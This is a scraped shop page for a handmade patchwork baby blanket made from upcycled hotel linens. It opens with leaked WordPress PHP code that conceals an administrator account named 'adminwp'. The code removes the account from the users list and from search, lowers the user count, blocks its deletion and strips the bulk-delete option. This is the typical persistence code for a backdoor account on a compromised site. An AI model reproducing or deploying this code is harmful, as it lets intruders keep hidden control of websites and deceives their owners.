add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'adminwp') { wp_die( __('User adminwp tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'adminwp'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; }); Two by Two - New Kids in the House : New Kids in the House yz9CDIm90hc8NvJjnm_WUrcZaR71UfJfT3cooSWrPoE
menuclose
< back to overview
product-image product-image product-image product-image product-image product-image

Two by Two patchwork blanket

Sold out

This colorful patchwork baby blanket is a soft, eco-friendly choice for your little one. Made from upcycled hotel bed linens and filled with a thicker padding for extra comfort, it’s perfect as a crawling mat or play blanket. Handcrafted in our studio in Nuremberg, it combines sustainability with warmth and softness. The breathable cotton and vibrant design create a cozy, safe space for babies to explore and play. A beautiful and practical addition to your nursery or for on-the-go adventures.

Please wash separately as colours may bleed.

– 100% cotton (upcycled)
– 90 cm x 125 cm
– filled with cotton fleece
– limited edition
– handmade in Germany

Delivery and payment

Bag

0